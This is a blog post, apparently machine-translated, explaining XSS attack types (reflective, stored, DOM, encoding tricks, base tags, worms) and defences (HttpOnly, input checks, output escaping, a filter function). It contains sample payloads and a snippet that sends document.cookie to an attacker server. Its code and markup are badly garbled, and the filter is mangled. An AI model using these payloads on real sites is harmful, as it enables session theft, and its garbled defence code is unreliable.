Moment For Technology

Blow the interviewer: XSS most complete attack and defense war!

Posted on Jan. 31, 2023, 1:50 p.m. by 樊龍
Category: The front end Tag: javascript


In order to improve page performance, reduce the bad time, my details page receive upper cover to get a list of parameters, this is a table in a page has loaded the image links, when to jump to my page, in the first place to display the image (browser cache), it can greatly reduce the bad time.

Of course, IN order to prevent XSS, I did a strict filter on this image.

Until one day, my leader sent me a link, clicked it, and there was an ugly picture in the middle. I was stunned. I immediately copied the link, took cover and decoded it, and found the external "illegal link", and my leader said that your page had been XSS.

Ok, probably XSS, so I decided to add a layer of verification to the image domain: the image domain must be our domain name.

Then modify, validate, publish, refresh the CDN in a 100-meter sprint...

So, is the problem solved? Looks like it's settled! Doesn't look like it's all worked out again?

So what is solved?

Let's walk into the world of XSS!


Cross Site Script (CSS), but to distinguish it from Cascading CSS(Cascading Style Sheet), is a security domain called "XSS".

In the 1990s, these attacks were mostly cross-domain attacks, and a website was a domain name, hence the name "cross-site scripting". Today, however, it does not matter whether it is cross-domain or not, and because of this historical reason, the name XSS has persisted to this day.

Contents of this article:

XSS main classification;

XSS payload attack; Character encoding attacks; Attack with Base tag; XSS worm attack;

HttpOnly defense; User input check defense; HTML output check defense; Output defense in CSS Rich text defense

XSS main classification

  1. Reflective XSS

    Reflective XSS, as the name suggests, simply "reflects" the user's input back to the browser. Such as access links: (1) to perform in the page and the document. The getElementById (" content "). The innerHTML = content; However, the content is passed in as a parameter, which triggers reflective XSS.

  2. Type stored XSS

    Stored XSS, as the name suggests, is already stored by the server, such as when a user enters a comment in a text box and submits it to the background. Other users then view the comments, causing stored XSS to be triggered. For example, the user enters:

    scriptalert(1) /script

    Copy the code

    The front end then renders the innerHTML to the comment area, and all users viewing the comment pop up with a "1" window, so the impact of stored XSS is huge.

  3. The DOM model XSS

    DOm XSS, in effect, also belongs to reflective XSS, but because of its particularity, DOm XSS is taken out separately. For example, with a button on a page, the user enters a link and then clicks jump to jump to that link.

    div id="jump"/div

    input type="button" id="msg" value="Comfire" onclick="myClick()"

    img src="#" onerror=alert(/xss/)

    Copy the code
    function myClick(){

        let value = document.getElementById("msg").value;

        document.getElementById("jump").innerHTMl="a href='"+value+"'click/a";


    Copy the code

    We can type:

        'img src=onerror=alert(/xss/)/

    Copy the code

    So when you click jump, the page code is changed to:

    href=' 'img src=onerror=alert(/xss/)/click/a

    Copy the code

    If I hit jump, because the image link is empty, it will raise onError, and it will pop up "/ XSS /", so that's DOM XSS.

XSS payload

After a successful XSS attack, the attacker implants a malicious script into a page. Once the page is injected with a malicious script, the attacker can do various things, which is called the XSS Payload.

For example, the DOM XSS input link above, if changed to type: '';

When the user clicks the jump, xxx.js will be loaded, which can obtain the user's cookie, such as:

let img = document.createElement('img')

img.src = ""+escape(document.cookie);


Copy the code

This code secretly uploaded the client's cookies to the XXX server.

Once the cookie information is snooped on, the consequences are unbelievable.

Of course, not only get cookies, js that have been added can perform arbitrary operations, such as calling the interface, querying data, and then sending data to XXX server, or directly calling the interface, performing deletion operations, etc.

Attack using character encoding

In GB2312 series encoded HTML, %c0 can eat %5c (that is :). Baidu output a variable in a script tag, so submit input is "; Alert (/ XSS /) to realize the XSS attack on Baidu, using "to close the front". But Baidu escaped the double quotation marks as follows:

let redirectUrl = "\"; alert(/xss/);";

Copy the code

You can't XSS this way, the variable content is just a variable. But baidu returns the GBK/GB2312 encoding, so "%c1\" when combined, will become a Unicode character, so you can construct the input: %c0"; alert(/xss/); After submission, Baidu escaped the response and became:

let redirectUrl = "%c0\"; alert(/xss)";

Copy the code

Since it is GBK encoded, %c1\ is combined into a Unicode character, which just eats up "\" and becomes the following:

let redirectUrl = "繺"; alert(/xss/);

Copy the code

So it was XSS.

Use the Base tag

In code, we sometimes set the base tag in order to use relative paths. Such as:

base href=""

img src="/img/t1234342334.jpg"

Copy the code

In this case, the full path is base splicing SRC. In this case, the attacker could set the base tag anywhere on the page, then set the image and js file in the base path, and the page would be XSS.

base href=""

Copy the code

XSS worms

The core of XSS worm is to induce users to click on links. The attacker implants malicious HTML code in Web pages and sends it to target users. After users click on it, they will be infected and then automatically send disguised links to friends of infected users.

Once infected, the effects can be severe. Baidu space had appeared XSS worm incident in 2007.

The difficulty of the XSS worm attack is how to induce users to click on a disguised link.

XSS defenses

XSS is the number one enemy of the Web front end, and XSS defense is complex.


HttpOnly was first proposed by Microsoft and implemented in Internet Explorer 6, which has become a standard today. The browser disallows the page's JavaScript from accessing the Cookie with the HttpOly attribute.

HttpOnly is primarily intended to address Cookie hijacking after XSS, although it is not necessary to use HttpOnly if the page does not have XSS. For example, the XSS payload mentioned above gets Cookie information.

Using HttpOnly helps mitigate XSS attacks and prevents theft of sensitive Cookie information, not addressing XSS per se.

User input check

Input checks, sort of like "whitelisting," allow only eligible data to be stored. For example, the user name can contain only letters, digits, and underscores (_). Currently, both the server and the client implement the same input validation, which is too easy for attackers to bypass if it is only client-side validation.

XSS input check, also known as "XSS filter".

However, XSS filters sometimes have problems where they are more demanding. For example, the user enters the nickname "World first", and after passing through XSS filter, we get "World first". But if we were to display it directly on an HTML page, it would say: World \ "first \". This is obviously not what we want.

HTML output check

Generally speaking, the input needs to be checked, and the output, in addition to rich text is not easy to check, when the output to HTML, we also need to use encoding or escape etc to defend against XSS attacks.

In general, to combat XSS, we will escape at least the following characters for HTML encoding:

 --  amp;

 --  lt;

 --  gt;

" -- quot;

' -- #x27;

/ -- #x2f;

Copy the code

Output in CSS

Both the style tag and the style attribute in CSS can generate XSS, for example:



body: {




div style="background:url(javascript:alert(/xss/))"

Copy the code

In general, we prohibit user-modifiable variables inside the style tag and the style attribute of the HTML tag. If this is required, strict coding can be done, such as keeping only letters, digits, and underscores.

The rich text

Rich text is itself content that contains data such as tags and elements. When filtering rich text, we should eliminate "events" that may be embedded, such as onclick on elements, as well as special tags such as iframe,script,base,form, etc., which should also be removed.

If you need a more rigorous approach, you might want to use htmlParse to convert all the nodes into an AST and then filter them one by one to completely filter out possible XSS.

An XSS filter is provided below for your reference:

function xss(str){

    returnstr? str.replace(/ (? :^$|[\x00\x09-\x0D "'`=])/g,(m)={

        return m === '\t'   ? ' # 9. '  

            :  m === '\n'   ? ' # 10; ' 

            :  m === '\x0B' ? 'the # 11; ' 

            :  m === '\f'   ? 'the # 12; ' 

            :  m === '\r'   ? ' # 13; ' 

            :  m === ' '    ? ' # 32; ' 

            :  m === '='    ? 'the # 61; ' 

            :  m === ''    ? ' '

            :  m === ''    ? ' '

            :  m === '"'    ? '" '

            :  m === "'"    ? ' # 39; '

            :  m === '`    ? 'the # 96; '

            : '\uFFFD';

}) :' '


Copy the code

Welcome to follow my wechat official account:

About (Moment For Technology) is a global community with thousands techies from across the global hang out!Passionate technologists, be it gadget freaks, tech enthusiasts, coders, technopreneurs, or CIOs, you would find them all here.